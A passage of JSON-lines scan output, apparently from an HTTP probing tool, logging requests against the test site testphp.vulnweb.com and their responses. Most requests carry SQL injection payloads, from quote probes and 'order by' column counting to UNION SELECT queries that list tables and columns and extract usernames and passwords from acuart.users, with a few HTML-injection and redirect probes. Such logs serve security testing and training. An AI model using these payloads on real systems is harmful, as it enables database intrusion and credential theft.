Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproduc...\",\"time\":\"348.127403ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.660582377Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.php'\\u003ch1\\u003etefa\\u003c/h1\\u003e'\",\"input\":\"http://testphp.vulnweb.com:80/index.php'%3Ch1%3Etefa%3C/h1%3E'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php%27%3Ch1%3Etefa%3C/h1%3E%27\",\"time\":\"340.204032ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.665311156Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/lis\",\"input\":\"http://testphp.vulnweb.com:80/lis\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/lis\",\"time\":\"354.091622ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.667858435Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php=1'\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php=1'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php=1'\",\"time\":\"346.026489ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.669887861Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/list products.php\",\"input\":\"http://testphp.vulnweb.com:80/list%20products.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/list%20products.php\",\"time\":\"343.037949ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.670854488Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproduct\",\"input\":\"http://testphp.vulnweb.com:80/listproduct\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproduct\",\"time\":\"341.103631ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.672788172Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproduct.php\",\"input\":\"http://testphp.vulnweb.com:80/listproduct.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproduct.php\",\"time\":\"350.545122ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.67284314Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproduc\",\"input\":\"http://testphp.vulnweb.com:80/listproduc\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproduc\",\"time\":\"349.150604ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.674976527Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.phpunion select 'hello1','hello2','hello3','hello4','hello5'--+\",\"input\":\"http://testphp.vulnweb.com:80/index.phpunion%20select%20'hello1','hello2','hello3','hello4','hello5'--+\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.phpunion%20select%20%27hello1%27,%27hello2%27,%27hello3%27,%27hello4%27,%27hello5%27--+\",\"time\":\"347.89205ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.676697891Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.php'1or'1'='1\",\"input\":\"http://testphp.vulnweb.com:80/index.php'1or'1'='1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php'1or'1'='1\",\"time\":\"352.119657ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.680083627Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.phphttp://csgo-gg-wp.ru\",\"input\":\"http://testphp.vulnweb.com:80/index.phphttp://csgo-gg-wp.ru\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.phphttp://csgo-gg-wp.ru\",\"time\":\"346.794565ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.681776002Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts\",\"input\":\"http://testphp.vulnweb.com:80/listproducts\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts\",\"time\":\"349.472651ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.68286726Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.php''\",\"input\":\"http://testphp.vulnweb.com:80/index.php''\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php''\",\"time\":\"339.810681ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.695876543Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listp\",\"input\":\"http://testphp.vulnweb.com:80/listp\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listp\",\"time\":\"353.296252ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.373404104Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2'\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2'\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=2'\",\"time\":\"344.150104ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4976,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.375485914Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+11--+\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+11--+\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=2+order+by+11--+\",\"time\":\"353.431739ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":511,\"lines\":105,\"status_code\":200,\"content_length\":5311,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.375796416Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=1'\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=1'\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1'\",\"time\":\"349.662665ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4976,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.377990918Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=1%E2%80%9D\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=1%E2%80%9D\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%E2%80%9D\",\"time\":\"343.78632ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4868,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.379480529Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,+group_concat(uname,0x3a,pass)+from+acuart.users+--\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,+group_concat(uname,0x3a,pass)+from+acuart.users+--\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,+group_concat(uname,0x3a,pass)+from+acuart.users+--\",\"time\":\"353.475404ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5150,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.379506577Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,+group_concat(table_name)+from+information_schema.tables+where+table_schema='acuart'+--\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,+group_concat(table_name)+from+information_schema.tables+where+table_schema='acuart'+--\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,+group_concat(table_name)+from+information_schema.tables+where+table_schema='acuart'+--\",\"time\":\"353.232343ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5203,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.382044697Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php=cat=1\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php=cat=1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php=cat=1\",\"time\":\"362.073154ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.380175265Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+1--+\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+1--+\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=2+order+by+1--+\",\"time\":\"353.159645ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":511,\"lines\":105,\"status_code\":200,\"content_length\":5311,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.380936139Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?artist=2\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?artist=2\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=2\",\"time\":\"340.495624ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":498,\"lines\":103,\"status_code\":200,\"content_length\":5193,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.384650876Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+3--+\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+3--+\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=2+order+by+3--+\",\"time\":\"353.336908ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":511,\"lines\":105,\"status_code\":200,\"content_length\":5311,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.39089521Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=1+order+by+11+--\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=1+order+by+11+--\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+order+by+11+--\",\"time\":\"348.325751ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":640,\"lines\":108,\"status_code\":200,\"content_length\":7880,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.393259366Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=2\",\"time\":\"356.26171ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":511,\"lines\":105,\"status_code\":200,\"content_length\":5311,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.394126399Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?artist=3\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?artist=3\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=3\",\"time\":\"354.580223ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.394257249Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+12--+\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+12--+\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=2+order+by+12--+\",\"time\":\"353.133843ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4866,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.403920111Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+--\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+--\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+--\",\"time\":\"358.934581ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5143,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.406731182Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,database()+--\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,database()+--\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,database()+--\",\"time\":\"364.215876ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5147,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.408321336Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+2--+\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+2--+\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=2+order+by+2--+\",\"time\":\"359.626635ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":511,\"lines\":105,\"status_code\":200,\"content_length\":5311,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.409746551Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=1*\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=1*\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1*\",\"time\":\"354.427959ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.410726427Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,+group_concat(column_name)+from+information_schema.columns+where+table_name='users'+--\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,+group_concat(column_name)+from+information_schema.columns+where+table_name='users'+--\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,+group_concat(column_name)+from+information_schema.columns+where+table_name='users'+--\",\"time\":\"348.860398ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5184,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.41673588Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?artist=1\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?artist=1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=1\",\"time\":\"357.176083ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":653,\"lines\":110,\"status_code\":200,\"content_length\":7994,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:31.421180169Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=1\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1\",\"time\":\"353.593607ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":640,\"lines\":108,\"status_code\":200,\"content_length\":7880,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.316118577Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.asp\",\"input\":\"http://testphp.vulnweb.com:80/login.asp\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.asp\",\"time\":\"343.736036ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.323978385Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.html\",\"input\":\"http://testphp.vulnweb.com:80/login.html\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.html\",\"time\":\"339.830129ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.33142694Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login\",\"input\":\"http://testphp.vulnweb.com:80/login\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login\",\"time\":\"348.473808ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.334266595Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.\",\"input\":\"http://testphp.vulnweb.com:80/login.\",\"title\":\"404 Not 